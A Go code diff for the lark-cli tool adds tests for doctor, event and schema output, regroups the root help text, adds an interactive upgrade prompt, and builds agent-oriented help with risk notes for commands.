func TestDoctor_ExternalProvider_IdentityReadyHintNotBlockedCommand(t *testing.T) {
t.Setenv("LARKSUITE_CLI_CONFIG_DIR", t.TempDir())
if err := core.SaveMultiAppConfig(&core.MultiAppConfig{
CurrentApp: "default",
Apps: []core.AppConfig{{Name: "default", AppId: "cli_x", AppSecret: core.PlainSecret("secret"), Brand: core.BrandFeishu}},
}); err != nil {
t.Fatalf("SaveMultiAppConfig() error = %v", err)
}
// Provider serves neither identity: bot unsupported, user supported but not
// signed in → both unavailable → identity_ready fails.
cfg := &core.CliConfig{AppID: "cli_x", Brand: core.BrandFeishu, SupportedIdentities: uint8(extcred.SupportsUser)}
cred := credential.NewCredentialProvider(
[]extcred.Provider{&fakeExtProvider{name: "corp-sso", account: &extcred.Account{AppID: "cli_x"}}},
nil, nil,
func() (*http.Client, error) { return nil, nil },
)
out := &bytes.Buffer{}
f := &cmdutil.Factory{
Config: func() (*core.CliConfig, error) { return cfg, nil },
Credential: cred,
IOStreams: &cmdutil.IOStreams{Out: out, ErrOut: &bytes.Buffer{}},
}
if err := doctorRun(&DoctorOptions{Factory: f, Ctx: context.Background(), Offline: true}); err == nil {
t.Fatalf("doctorRun() = nil, want failure when no identity is available")
}
var got struct {
Checks []checkResult `json:"checks"`
}
if err := json.Unmarshal(out.Bytes(), &got); err != nil {
t.Fatalf("json.Unmarshal() error = %v\n%s", err, out.String())
}
ready := findCheck(t, got.Checks, "identity_ready")
if ready.Status != "fail" {
t.Fatalf("identity_ready status = %q, want fail", ready.Status)
}
// The summary defers to the per-identity checks; it carries no hint of its
// own (a command here would be wrong under an external provider).
if ready.Hint != "" {
t.Fatalf("identity_ready should carry no hint, got %q", ready.Hint)
}
user := findCheck(t, got.Checks, "user_identity")
if !strings.Contains(user.Hint, "external") || strings.Contains(user.Hint, "auth login") {
t.Fatalf("user_identity hint not external-appropriate: %q", user.Hint)
}
}

View File

@@ -10,10 +10,22 @@ import (
"github.com/larksuite/cli/internal/cmdutil"
"github.com/larksuite/cli/internal/core"
eventlib "github.com/larksuite/cli/internal/event"
_ "github.com/larksuite/cli/events"
)
func TestEventLookup_VCMeetingLifecycleKeys(t *testing.T) {
for _, key := range []string{
"vc.meeting.participant_meeting_started_v1",
"vc.meeting.participant_meeting_joined_v1",
} {
if _, ok := eventlib.Lookup(key); !ok {
t.Fatalf("event.Lookup(%q) should succeed", key)
}
}
}
func TestRunList_TextOutput(t *testing.T) {
f, stdout, _, _ := cmdutil.TestFactory(t, &core.CliConfig{AppID: "test"})
@@ -26,6 +38,9 @@ func TestRunList_TextOutput(t *testing.T) {
"KEY", "AUTH", "PARAMS", "DESCRIPTION",
"im.message.receive_v1",
"im.message.message_read_v1",
"task.task.update_user_access_v2",
"vc.meeting.participant_meeting_started_v1",
"vc.meeting.participant_meeting_joined_v1",
} {
if !strings.Contains(out, want) {
t.Errorf("list output missing %q; full output:\n%s", want, out)
@@ -55,4 +70,31 @@ func TestRunList_JSONOutput(t *testing.T) {
}
}
}
gotKeys := map[string]map[string]interface{}{}
for _, row := range rows {
if key, ok := row["key"].(string); ok {
gotKeys[key] = row
}
}
var foundTask bool
for key, row := range gotKeys {
if key == "task.task.update_user_access_v2" {
foundTask = true
if row["single_consumer"] != true {
t.Errorf("task row single_consumer = %v, want true", row["single_consumer"])
}
}
}
if !foundTask {
t.Fatal("event list JSON missing task.task.update_user_access_v2")
}
for _, want := range []string{
"vc.meeting.participant_meeting_started_v1",
"vc.meeting.participant_meeting_joined_v1",
} {
if _, ok := gotKeys[want]; !ok {
t.Errorf("JSON list output missing %q", want)
}
}
}

View File

@@ -96,6 +96,73 @@ func TestRunSchema_JSONOutput(t *testing.T) {
}
}
func TestRunSchema_TaskUpdateUserAccessJSON(t *testing.T) {
f, stdout, _, _ := cmdutil.TestFactory(t, &core.CliConfig{AppID: "test"})
if err := runSchema(f, "task.task.update_user_access_v2", true); err != nil {
t.Fatalf("runSchema json: %v", err)
}
var payload map[string]interface{}
if err := json.Unmarshal(stdout.Bytes(), &payload); err != nil {
t.Fatalf("output is not valid JSON: %v\n%s", err, stdout.String())
}
if payload["jq_root_path"] != ".event" {
t.Errorf("jq_root_path = %v, want .event", payload["jq_root_path"])
}
if payload["single_consumer"] != true {
t.Errorf("single_consumer = %v, want true", payload["single_consumer"])
}
resolved := payload["resolved_output_schema"].(map[string]interface{})
props := resolved["properties"].(map[string]interface{})
eventProps := props["event"].(map[string]interface{})["properties"].(map[string]interface{})
if got := eventProps["task_guid"].(map[string]interface{})["format"]; got != "task_guid" {
t.Errorf("task_guid format = %v, want task_guid", got)
}
if _, ok := eventProps["event_types"].(map[string]interface{})["items"].(map[string]interface{})["enum"]; !ok {
t.Fatalf("event_types enum missing in schema: %#v", eventProps["event_types"])
}
}
func TestRunSchema_JSONOutput_VCMeetingLifecycleKeys(t *testing.T) {
for _, key := range []string{
"vc.meeting.participant_meeting_started_v1",
"vc.meeting.participant_meeting_joined_v1",
} {
t.Run(key, func(t *testing.T) {
f, stdout, _, _ := cmdutil.TestFactory(t, &core.CliConfig{AppID: "test"})
if err := runSchema(f, key, true); err != nil {
t.Fatalf("runSchema json: %v", err)
}
var payload map[string]interface{}
if err := json.Unmarshal(stdout.Bytes(), &payload); err != nil {
t.Fatalf("output is not valid JSON: %v\n%s", err, stdout.String())
}
if payload["key"] != key {
t.Errorf("key = %v, want %s", payload["key"], key)
}
resolved, ok := payload["resolved_output_schema"].(map[string]interface{})
if !ok {
t.Fatalf("resolved_output_schema missing or wrong type: %+v", payload)
}
properties, ok := resolved["properties"].(map[string]interface{})
if !ok {
t.Fatalf("resolved_output_schema.properties missing or wrong type: %+v", resolved)
}
for _, field := range []string{"type", "event_id", "timestamp", "meeting_id", "topic", "meeting_no", "start_time", "calendar_event_id"} {
if _, ok := properties[field]; !ok {
t.Errorf("resolved output schema missing field %q: %+v", field, properties)
}
}
if _, ok := properties["end_time"]; ok {
t.Errorf("resolved output schema should not include end_time for %s: %+v", key, properties)
}
})
}
}
func TestSchema_RendersSubscriptionKeyMarker(t *testing.T) {
const syntheticKey = "test.evt_sub"
t.Cleanup(func() { eventlib.UnregisterKeyForTest(syntheticKey) })

View File

@@ -11,9 +11,11 @@ import (
"sort"
"strings"
"github.com/larksuite/cli/cmd/service"
"github.com/larksuite/cli/errs"
"github.com/larksuite/cli/extension/platform"
"github.com/larksuite/cli/internal/build"
"github.com/larksuite/cli/internal/cmdmeta"
"github.com/larksuite/cli/internal/cmdpolicy"
"github.com/larksuite/cli/internal/cmdutil"
"github.com/larksuite/cli/internal/deprecation"
@@ -28,43 +30,60 @@ import (
const rootLong = `lark-cli — Lark/Feishu CLI tool.
USAGE:
lark-cli <command> [subcommand] [method] [options]
lark-cli api <method> <path> [--params <json>] [--data <json>]
lark-cli schema <service.resource.method>
AGENT QUICKSTART (driving this as an agent? start here):
Browse commands: lark-cli <domain> --help # +shortcuts (preferred) and raw API resources
Inspect a call: lark-cli schema <service>.<resource>.<method> # params, types, scopes, examples
Prefer a +shortcut over the raw API resource when one matches the task.
Risk: each command's --help shows read | write | high-risk-write;
high-risk-write needs --yes, only after the user confirms.
On any API call: --jq <expr> filters JSON output, --dry-run previews the request (runs nothing).
EXAMPLES:
# View upcoming events
lark-cli calendar +agenda
EXAMPLES (one per command style, in order of preference):
lark-cli calendar +agenda # +shortcut — a high-level task, prefer these
lark-cli mail user_mailbox.messages list --user-mailbox-id me # typed command for one API method
lark-cli schema mail.user_mailbox.messages.list # inspect a method's params before calling
lark-cli api GET /open-apis/calendar/v4/calendars # raw escape hatch — any endpoint by HTTP path`
# List calendar events
lark-cli calendar events instance_view --params '{"calendar_id":"primary","start_time":"1700000000","end_time":"1700086400"}'
// rootUsageTemplate is cobra's default usage template with two root-only
// additions gated on {{if not .HasParent}}: a curated multi-form Usage synopsis
// (replacing cobra's generic "[flags] / [command]") and a human skills-setup
// footer. Subcommands render the stock template unchanged. The rest is verbatim
// cobra so the command groups and flags are untouched.
const rootUsageTemplate = `{{if .HasParent}}Usage:{{if .Runnable}}
{{.UseLine}}{{end}}{{if .HasAvailableSubCommands}}
{{.CommandPath}} [command]{{end}}{{else}}Usage:
lark-cli <command> [subcommand] [method] [flags]
lark-cli api <method> <path> [--params <json>] [--data <json>]
lark-cli schema <service.resource.method>{{end}}{{if gt (len .Aliases) 0}}
# Search users
lark-cli contact +search-user --query "John"
Aliases:
{{.NameAndAliases}}{{end}}{{if .HasExample}}
# Generic API call
lark-cli api GET /open-apis/calendar/v4/calendars
Examples:
{{.Example}}{{end}}{{if .HasAvailableSubCommands}}{{$cmds := .Commands}}{{if eq (len .Groups) 0}}
AI AGENT SKILLS:
lark-cli pairs with AI agent skills (Claude Code, etc.) that
teach the agent Lark API patterns, best practices, and workflows.
Available Commands:{{range $cmds}}{{if (or .IsAvailableCommand (eq .Name "help"))}}
{{rpad .Name .NamePadding }} {{.Short}}{{end}}{{end}}{{else}}{{range $group := .Groups}}
Install all skills:
npx skills add larksuite/cli -g -y
{{.Title}}{{range $cmds}}{{if (and (eq .GroupID $group.ID) (or .IsAvailableCommand (eq .Name "help")))}}
{{rpad .Name .NamePadding }} {{.Short}}{{end}}{{end}}{{end}}{{if not .AllChildCommandsHaveGroup}}
Or pick specific domains:
npx skills add larksuite/cli -s lark-calendar -y
npx skills add larksuite/cli -s lark-im -y
Additional Commands:{{range $cmds}}{{if (and (eq .GroupID "") (or .IsAvailableCommand (eq .Name "help")))}}
{{rpad .Name .NamePadding }} {{.Short}}{{end}}{{end}}{{end}}{{end}}{{end}}{{if .HasAvailableLocalFlags}}
Learn more: https://github.com/larksuite/cli#agent-skills
Flags:
{{.LocalFlags.FlagUsages | trimTrailingWhitespaces}}{{end}}{{if .HasAvailableInheritedFlags}}
COMMUNITY:
GitHub: https://github.com/larksuite/cli
Issues: https://github.com/larksuite/cli/issues
Docs: https://open.feishu.cn/document/
Global Flags:
{{.InheritedFlags.FlagUsages | trimTrailingWhitespaces}}{{end}}{{if .HasHelpSubCommands}}
More help: lark-cli <command> --help`
Additional help topics:{{range .Commands}}{{if .IsAdditionalHelpTopicCommand}}
{{rpad .CommandPath .CommandPathPadding}} {{.Short}}{{end}}{{end}}{{end}}{{if .HasAvailableSubCommands}}
Use "{{.CommandPath}} [command] --help" for more information about a command.{{end}}{{if not .HasParent}}
Skills setup (one-time, humans): npx skills add larksuite/cli -g -y — https://github.com/larksuite/cli#agent-skills{{end}}
`
// Execute runs the root command and returns the process exit code.
// rawInvocationArgs holds os.Args[1:] captured at Execute() entry. cobra's
@@ -529,6 +548,49 @@ func availableSubcommandNames(cmd *cobra.Command) (available, deprecated []strin
return available, deprecated
}
// Root command help groups, so an agent sees content domains, agent tooling, and
// CLI management as distinct blocks instead of one flat alphabetical dump.
const (
groupDomains = "lark-domains"
groupTooling = "agent-tooling"
groupManagement = "cli-management"
)
// groupRootCommands classifies root's direct children into the help groups,
// called once after all commands are registered. Unclassified commands fall to
// cobra's "Additional Commands" section.
func groupRootCommands(root *cobra.Command) {
root.AddGroup(
&cobra.Group{ID: groupDomains, Title: "Lark domains:"},
&cobra.Group{ID: groupTooling, Title: "Agent tooling:"},
&cobra.Group{ID: groupManagement, Title: "CLI management:"},
)
tooling := map[string]bool{"api": true, "schema": true, "skills": true, "agent": true}
management := map[string]bool{"auth": true, "config": true, "profile": true, "doctor": true, "update": true}
for _, c := range root.Commands() {
if c.GroupID != "" {
continue
}
switch {
case tooling[c.Name()]:
c.GroupID = groupTooling
case management[c.Name()]:
c.GroupID = groupManagement
case isLarkDomain(c):
c.GroupID = groupDomains
}
}
}
// isLarkDomain reports whether a root child is a Lark domain (service-sourced or
// shortcut-tagged), not CLI tooling. Mirrors service.PrepareDomainHelp.
func isLarkDomain(c *cobra.Command) bool {
if src, _ := cmdmeta.SourceOf(c); src == cmdmeta.SourceService {
return true
}
return cmdmeta.Domain(c) != ""
}
// flagDidYouMean is the root FlagErrorFunc (inherited by all subcommands). It
// converts cobra's flag-parse errors into a typed validation envelope: an
// unknown flag gets a focused "did you mean" hint (so agents recover even when
@@ -610,6 +672,17 @@ func installTipsHelpFunc(root *cobra.Command) {
defer func() { f.Hidden = true }()
}
}
// Domain and method commands compose their agent guidance into Long lazily
// here (shortcuts attach after service registration); both skip the generic
// bottom-of-help append below.
if service.PrepareDomainHelp(cmd, embeddedSkillContent) {
defaultHelp(cmd, args)
return
}
if service.PrepareMethodHelp(cmd) {
defaultHelp(cmd, args)
return
}
defaultHelp(cmd, args)
out := cmd.OutOrStdout()
if level, ok := cmdutil.GetRisk(cmd); ok {

View File

@@ -76,11 +76,13 @@ func TestPersistentPreRunE_ConfigSubcommands(t *testing.T) {
}
func TestRootLong_AgentSkillsLinkTargetsReadmeSection(t *testing.T) {
if !strings.Contains(rootLong, "https://github.com/larksuite/cli#agent-skills") {
t.Fatalf("root help should link to the README Agent Skills section, got:\n%s", rootLong)
// The human skills-install guidance now lives in the root usage-template
// footer (below the command list), not in the agent-facing Long.
if !strings.Contains(rootUsageTemplate, "https://github.com/larksuite/cli#agent-skills") {
t.Fatalf("root help footer should link to the README Agent Skills section, got:\n%s", rootUsageTemplate)
}
if strings.Contains(rootLong, "https://github.com/larksuite/cli#install-ai-agent-skills") {
t.Fatalf("root help should not reference the removed install-ai-agent-skills anchor, got:\n%s", rootLong)
if strings.Contains(rootUsageTemplate, "https://github.com/larksuite/cli#install-ai-agent-skills") {
t.Fatalf("root help should not reference the removed install-ai-agent-skills anchor, got:\n%s", rootUsageTemplate)
}
}

90
cmd/root_upgrade.go Normal file
View File

@@ -0,0 +1,90 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package cmd
import (
"bufio"
"fmt"
"io"
"strings"
"github.com/larksuite/cli/internal/build"
"github.com/larksuite/cli/internal/cmdutil"
"github.com/larksuite/cli/internal/update"
"github.com/spf13/cobra"
)
// runRootUpgrade locates the registered `update` subcommand and runs it, so the
// interactive root-command upgrade reuses exactly `lark-cli update` behavior
// (install-method detection, output, error handling). Package-level var so
// tests can stub it and avoid real network / self-update.
var runRootUpgrade = func(cmd *cobra.Command) {
for _, c := range cmd.Root().Commands() {
if c.Name() == "update" && c.RunE != nil {
_ = c.RunE(c, nil) // update prints its own output/errors; swallow here
return
}
}
}
// isBareRootInvocation reports whether this is a bare `lark-cli` (no subcommand,
// no flags) — the only invocation that triggers the interactive upgrade prompt.
// Mirrors unknownSubcommandRunE's "bare group prints help" branch: args empty
// AND no flag tokens in the raw invocation.
func isBareRootInvocation(args []string) bool {
return len(args) == 0 && len(flagTokensInArgs(rawInvocationArgs)) == 0
}
// readYes reads one line and reports whether it is an affirmative y/yes.
// EOF / empty / anything else → false (default No, matching the [y/N] prompt).
func readYes(r io.Reader) bool {
line, _ := bufio.NewReader(r).ReadString('\n')
switch strings.ToLower(strings.TrimSpace(line)) {
case "y", "yes":
return true
default:
return false
}
}
// offerRootUpgrade prompts for an interactive upgrade when running bare
// `lark-cli` in an interactive terminal with a cached newer version. Every
// failure is swallowed — it must never affect help output or the exit code.
func offerRootUpgrade(f *cmdutil.Factory, cmd *cobra.Command) {
ios := f.IOStreams
// Gates 1/2/3: need to read stdin AND show the prompt on stderr, and require
// stdout TTY too so this only fires in a pure foreground terminal session.
if !ios.IsTerminal || !ios.OutIsTerminal || !ios.StderrIsTerminal {
return
}
// Gate 4: cached newer version. CheckCached applies opt-out (shouldSkip)
// and the IsNewer/semver validation chain; it reads the on-disk cache that
// the 24h-throttled RefreshCache maintains (CheckCached itself has no TTL).
info := update.CheckCached(build.Version)
if info == nil {
return
}
fmt.Fprintf(ios.ErrOut, "lark-cli %s available (current %s). Upgrade now? [y/N]: ", info.Latest, info.Current)
if !readYes(ios.In) {
return
}
runRootUpgrade(cmd)
}
// installRootUpgradePrompt wraps the root command's RunE (set to
// unknownSubcommandRunE by installUnknownSubcommandGuard) so a bare `lark-cli`
// invocation offers an interactive upgrade before printing help. Non-bare
// invocations are passed straight through, unchanged.
func installRootUpgradePrompt(f *cmdutil.Factory, root *cobra.Command) {
inner := root.RunE
if inner == nil {
return
}
root.RunE = func(cmd *cobra.Command, args []string) error {
if isBareRootInvocation(args) {
offerRootUpgrade(f, cmd)
}
return inner(cmd, args)
}
}

191
cmd/root_upgrade_test.go Normal file
View File

@@ -0,0 +1,191 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package cmd
import (
"bytes"
"fmt"
"os"
"path/filepath"
"strings"
"testing"
"time"
"github.com/larksuite/cli/internal/build"
"github.com/larksuite/cli/internal/cmdutil"
"github.com/larksuite/cli/internal/core"
"github.com/spf13/cobra"
)
func writeUpdateState(t *testing.T, dir, latest string) {
t.Helper()
data := fmt.Sprintf(`{"latest_version":%q,"checked_at":%d}`, latest, time.Now().Unix())
if err := os.WriteFile(filepath.Join(dir, "update-state.json"), []byte(data), 0o644); err != nil {
t.Fatal(err)
}
}
func TestReadYes(t *testing.T) {
cases := map[string]bool{
"y\n": true, "Y\n": true, "yes\n": true, "YES\n": true, " y \n": true,
"n\n": false, "\n": false, "": false, "nope\n": false, "yeah\n": false,
}
for in, want := range cases {
if got := readYes(strings.NewReader(in)); got != want {
t.Errorf("readYes(%q) = %v, want %v", in, got, want)
}
}
}
func TestIsBareRootInvocation(t *testing.T) {
orig := rawInvocationArgs
t.Cleanup(func() { rawInvocationArgs = orig })
rawInvocationArgs = nil
if !isBareRootInvocation([]string{}) {
t.Error("empty args + no raw flag tokens should be bare")
}
rawInvocationArgs = []string{"--profile", "x"}
if isBareRootInvocation([]string{}) {
t.Error("flag token present → not bare")
}
rawInvocationArgs = nil
if isBareRootInvocation([]string{"im"}) {
t.Error("positional arg → not bare")
}
}
func TestOfferRootUpgrade(t *testing.T) {
origV := build.Version
build.Version = "1.0.0" // release version so shouldSkip()==false
t.Cleanup(func() { build.Version = origV })
origRun := runRootUpgrade
t.Cleanup(func() { runRootUpgrade = origRun })
// This test builds a Factory literal (no NewDefault), so it never runs
// workspace detection; pin the process-global workspace to Local so
// statePath() resolves under LARKSUITE_CLI_CONFIG_DIR rather than a stale
// subdir inherited from a prior test in the package.
origWS := core.CurrentWorkspace()
t.Cleanup(func() { core.SetCurrentWorkspace(origWS) })
core.SetCurrentWorkspace(core.WorkspaceLocal)
cases := []struct {
name string
in, out, err bool
input string
latest string // "" → no state file (CheckCached nil)
optOut bool
wantPrompt, wantRun bool
}{
{"all-tty+y", true, true, true, "y\n", "2.0.0", false, true, true},
{"all-tty+yes", true, true, true, "yes\n", "2.0.0", false, true, true},
{"all-tty+n", true, true, true, "n\n", "2.0.0", false, true, false},
{"all-tty+empty", true, true, true, "\n", "2.0.0", false, true, false},
{"all-tty+eof", true, true, true, "", "2.0.0", false, true, false},
{"stdin-not-tty", false, true, true, "y\n", "2.0.0", false, false, false},
{"stdout-not-tty", true, false, true, "y\n", "2.0.0", false, false, false},
{"stderr-not-tty", true, true, false, "y\n", "2.0.0", false, false, false},
{"no-newer-version", true, true, true, "y\n", "", false, false, false},
{"already-latest", true, true, true, "y\n", "1.0.0", false, false, false}, // post-upgrade: current == cached latest → no prompt
{"cache-older-than-current", true, true, true, "y\n", "0.9.0", false, false, false},
{"opt-out", true, true, true, "y\n", "2.0.0", true, false, false},
}
for _, tc := range cases {
t.Run(tc.name, func(t *testing.T) {
dir := t.TempDir()
t.Setenv("LARKSUITE_CLI_CONFIG_DIR", dir)
// Clear env that update.shouldSkip treats as "suppress" so the
// test is deterministic regardless of host (GitHub Actions sets
// CI=true, which would otherwise suppress the prompt).
t.Setenv("CI", "")
t.Setenv("BUILD_NUMBER", "")
t.Setenv("RUN_ID", "")
t.Setenv("LARKSUITE_CLI_NO_UPDATE_NOTIFIER", "")
if tc.latest != "" {
writeUpdateState(t, dir, tc.latest)
}
if tc.optOut {
t.Setenv("LARKSUITE_CLI_NO_UPDATE_NOTIFIER", "1")
}
called := false
runRootUpgrade = func(*cobra.Command) { called = true }
var errBuf bytes.Buffer
f := &cmdutil.Factory{IOStreams: &cmdutil.IOStreams{
In: strings.NewReader(tc.input),
Out: &bytes.Buffer{},
ErrOut: &errBuf,
IsTerminal: tc.in,
OutIsTerminal: tc.out,
StderrIsTerminal: tc.err,
}}
offerRootUpgrade(f, &cobra.Command{})
gotPrompt := strings.Contains(errBuf.String(), "available")
if gotPrompt != tc.wantPrompt {
t.Errorf("prompt: got %v want %v (stderr=%q)", gotPrompt, tc.wantPrompt, errBuf.String())
}
if called != tc.wantRun {
t.Errorf("runRootUpgrade called: got %v want %v", called, tc.wantRun)
}
})
}
}
func TestInstallRootUpgradePromptPreservesInner(t *testing.T) {
orig := rawInvocationArgs
t.Cleanup(func() { rawInvocationArgs = orig })
rawInvocationArgs = nil
innerCalls := 0
root := &cobra.Command{Use: "lark-cli"}
root.RunE = func(cmd *cobra.Command, args []string) error { innerCalls++; return nil }
f := &cmdutil.Factory{IOStreams: &cmdutil.IOStreams{
In: strings.NewReader(""), Out: &bytes.Buffer{}, ErrOut: &bytes.Buffer{},
}}
installRootUpgradePrompt(f, root)
if err := root.RunE(root, []string{}); err != nil {
t.Fatalf("bare RunE err = %v", err)
}
if err := root.RunE(root, []string{"im"}); err != nil {
t.Fatalf("non-bare RunE err = %v", err)
}
if innerCalls != 2 {
t.Errorf("inner RunE should run for both bare and non-bare, got %d", innerCalls)
}
}
// TestRunRootUpgradeDispatchesToUpdate covers the real runRootUpgrade dispatch
// path (not the stub used elsewhere): from any command it must locate the
// registered "update" subcommand via cmd.Root() and invoke its RunE.
func TestRunRootUpgradeDispatchesToUpdate(t *testing.T) {
root := &cobra.Command{Use: "lark-cli"}
ran := 0
root.AddCommand(&cobra.Command{Use: "update", RunE: func(*cobra.Command, []string) error { ran++; return nil }})
child := &cobra.Command{Use: "im"}
root.AddCommand(child)
runRootUpgrade(child) // child.Root() resolves to root, which has "update"
if ran != 1 {
t.Errorf("runRootUpgrade should locate and run update's RunE once, got %d", ran)
}
}
// TestInstallRootUpgradePromptNilInnerNoop covers the inner == nil guard:
// when root has no RunE, installRootUpgradePrompt must not wrap it.
func TestInstallRootUpgradePromptNilInnerNoop(t *testing.T) {
root := &cobra.Command{Use: "lark-cli"} // RunE is nil
f := &cmdutil.Factory{IOStreams: &cmdutil.IOStreams{
In: strings.NewReader(""), Out: &bytes.Buffer{}, ErrOut: &bytes.Buffer{},
}}
installRootUpgradePrompt(f, root)
if root.RunE != nil {
t.Error("installRootUpgradePrompt must not wrap a nil RunE (inner==nil guard)")
}
}

View File

@@ -4,41 +4,211 @@
package service
import (
"encoding/json"
"fmt"
"io/fs"
"strings"
"github.com/larksuite/cli/internal/affordance"
"github.com/larksuite/cli/internal/cmdmeta"
"github.com/larksuite/cli/internal/cmdutil"
"github.com/larksuite/cli/internal/meta"
"github.com/spf13/cobra"
)
// methodLong composes a method command's long help in one place: the
// description, the affordance guidance block (when the method has one), the
// pointer to the full schema, and the params-only addendum (params whose flag
// name is taken — paramFlagBinder.paramsOnlyHelp, "" when none). Affordance
// sits near the top so an agent sees when-to-use and few-shot examples before
// the flag list.
func methodLong(description, affordance, schemaPath, paramsOnly string) string {
// PrepareDomainHelp appends navigational guidance (routing line, risk legend,
// skill pointer) to a top-level Lark domain's description, returning false for
// anything that is not such a domain. Built lazily at help time because
// shortcuts attach after service registration. skillFS (nil-safe) gates the
// skill pointer.
//
// A hand-authored Long is preserved as the base (e.g. event's "Use 'event
// consume <EventKey>'…"); service domains carry only a Short at this point, so
// we fall back to it. The pristine base is captured once into an annotation so
// re-rendering does not append the guidance twice.
func PrepareDomainHelp(cmd *cobra.Command, skillFS fs.FS) bool {
if cmd.Annotations[schemaPathAnnotation] != "" {
return false // a method command
}
// Direct child of root only — so Domain() reads this command's own tag, and
// nested resource groups are excluded.
if cmd.Parent() == nil || cmd.Parent().Parent() != nil {
return false
}
// A domain is service-sourced or shortcut-tagged; CLI tooling has neither.
if src, _ := cmdmeta.SourceOf(cmd); src != cmdmeta.SourceService && cmdmeta.Domain(cmd) == "" {
return false
}
if !cmd.HasAvailableSubCommands() {
return false
}
hasShortcuts, hasResources := false, false
for _, c := range cmd.Commands() {
if c.Hidden || c.Name() == "help" || c.Name() == "completion" {
continue
}
if strings.HasPrefix(c.Name(), "+") {
hasShortcuts = true
} else {
hasResources = true
}
}
var b strings.Builder
b.WriteString(domainHelpBase(cmd))
if hasShortcuts && hasResources { // routing only matters when both styles exist
b.WriteString("\n\nPrefer a +-prefixed shortcut when one matches your task; otherwise use the raw API resource below.")
}
b.WriteString("\n\nRisk levels (read | write | high-risk-write) appear in each command's --help; high-risk-write requires --yes, only after the user confirms.")
if skill := "lark-" + cmd.Name(); skillFS != nil {
if _, err := fs.Stat(skillFS, skill+"/SKILL.md"); err == nil {
fmt.Fprintf(&b, "\n\nDomain guide (concepts, command choice, conventions): lark-cli skills read %s", skill)
}
}
cmd.Long = b.String()
return true
}
// domainHelpBase returns the description to seed domain help with — the
// hand-authored Long when present, else the Short — captured once into an
// annotation so re-rendering reuses the pristine text instead of the
// already-augmented Long.
func domainHelpBase(cmd *cobra.Command) string {
if base, ok := cmd.Annotations[domainBaseAnnotation]; ok {
return base
}
base := cmd.Long
if base == "" {
base = cmd.Short
}
if cmd.Annotations == nil {
cmd.Annotations = map[string]string{}
}
cmd.Annotations[domainBaseAnnotation] = base
return base
}
// methodLong is the build-time Long (description + schema pointer +
// params-only addendum). Agent guidance is added lazily by PrepareMethodHelp,
// so command construction never parses the overlay.
func methodLong(description, schemaPath, paramsOnly string) string {
var b strings.Builder
b.WriteString(description)
if affordance != "" {
b.WriteString("\n\n")
b.WriteString(affordance)
}
fmt.Fprintf(&b, "\n\nView parameter definitions before calling:\n lark-cli schema %s", schemaPath)
fmt.Fprintf(&b, "\n\nFull parameter schema:\n lark-cli schema %s", schemaPath)
b.WriteString(paramsOnly)
return b.String()
}
// renderAffordance renders a method's affordance as a help block — when to use,
// prerequisites, and (most importantly for agents) few-shot Examples — or "" when
// the method carries no affordance. It reads the single typed model
// (meta.Method.ParsedAffordance) so the help and the envelope agree on shape.
// Annotation keys PrepareMethodHelp reads to rebuild a method command's Long.
const (
affordanceServiceAnnotation = "affordance-service"
affordanceMethodAnnotation = "affordance-method"
schemaPathAnnotation = "method-schema-path"
paramsOnlyAnnotation = "method-params-only"
domainBaseAnnotation = "affordance-domain-base"
)
// setMethodHelpData records the coordinates PrepareMethodHelp needs (storing a
// few strings is the only build-time cost; the overlay stays untouched).
func setMethodHelpData(cmd *cobra.Command, service, methodID, schemaPath, paramsOnly string) {
if cmd.Annotations == nil {
cmd.Annotations = map[string]string{}
}
if service != "" && methodID != "" {
cmd.Annotations[affordanceServiceAnnotation] = service
cmd.Annotations[affordanceMethodAnnotation] = methodID
}
cmd.Annotations[schemaPathAnnotation] = schemaPath
if paramsOnly != "" {
cmd.Annotations[paramsOnlyAnnotation] = paramsOnly
}
}
// PrepareMethodHelp rebuilds a generated method command's Long with the agent
// guidance at the TOP (Risk, then the affordance block, then the schema
// pointer), returning false for non-method commands. The overlay is parsed
// here — only when help is rendered.
func PrepareMethodHelp(cmd *cobra.Command) bool {
ann := cmd.Annotations
if ann == nil {
return false
}
schemaPath, ok := ann[schemaPathAnnotation]
if !ok {
return false
}
var b strings.Builder
b.WriteString(cmd.Short)
if level, ok := cmdutil.GetRisk(cmd); ok {
// --yes asserts the USER confirmed; the agent must not self-approve.
if level == cmdutil.RiskHighRiskWrite {
fmt.Fprintf(&b, "\n\nRisk: %s (requires explicit user confirmation to execute; the agent must NOT add --yes on its own — only pass --yes after the user has confirmed)", level)
} else {
fmt.Fprintf(&b, "\n\nRisk: %s", level)
}
}
var skills []string
if raw, ok := affordanceRaw(cmd); ok {
if block := renderAffordance(meta.Method{Affordance: raw}); block != "" {
b.WriteString("\n\n")
b.WriteString(block)
}
if a, ok := (meta.Method{Affordance: raw}).ParsedAffordance(); ok {
skills = a.Skills
}
}
fmt.Fprintf(&b, "\n\nFull parameter schema:\n lark-cli schema %s", schemaPath)
b.WriteString(ann[paramsOnlyAnnotation])
if len(skills) > 0 {
b.WriteString("\n\nWorkflow skill (end-to-end usage):")
for _, s := range skills {
fmt.Fprintf(&b, "\n lark-cli skills read %s", s)
}
}
cmd.Long = b.String()
return true
}
// affordanceLookup is the overlay source; a package var so tests can inject.
var affordanceLookup = affordance.For
// RenderAffordanceForCmd renders a method command's affordance block, or "" when
// it carries none.
func RenderAffordanceForCmd(cmd *cobra.Command) string {
raw, ok := affordanceRaw(cmd)
if !ok {
return ""
}
return renderAffordance(meta.Method{Affordance: raw})
}
func affordanceRaw(cmd *cobra.Command) (json.RawMessage, bool) {
if cmd.Annotations == nil {
return nil, false
}
service := cmd.Annotations[affordanceServiceAnnotation]
methodID := cmd.Annotations[affordanceMethodAnnotation]
if service == "" || methodID == "" {
return nil, false
}
return affordanceLookup(service, methodID)
}
// renderAffordance renders a method's affordance as a help block, or "" when it
// has none. Sections are joined with blank lines so they scan as distinct groups.
func renderAffordance(m meta.Method) string {
a, ok := m.ParsedAffordance()
if !ok {
return ""
}
var b strings.Builder
var sections []string
bullets := func(title string, items []string) {
var nonEmpty []string
for _, it := range items {
@@ -49,15 +219,18 @@ func renderAffordance(m meta.Method) string {
if len(nonEmpty) == 0 {
return
}
fmt.Fprintf(&b, "%s:\n", title)
var s strings.Builder
fmt.Fprintf(&s, "%s:\n", title)
for _, it := range nonEmpty {
fmt.Fprintf(&b, " • %s\n", it)
fmt.Fprintf(&s, " • %s\n", it)
}
sections = append(sections, strings.TrimRight(s.String(), "\n"))
}
bullets("When to use", a.UseWhen)
bullets("Avoid when", a.DoNotUseWhen)
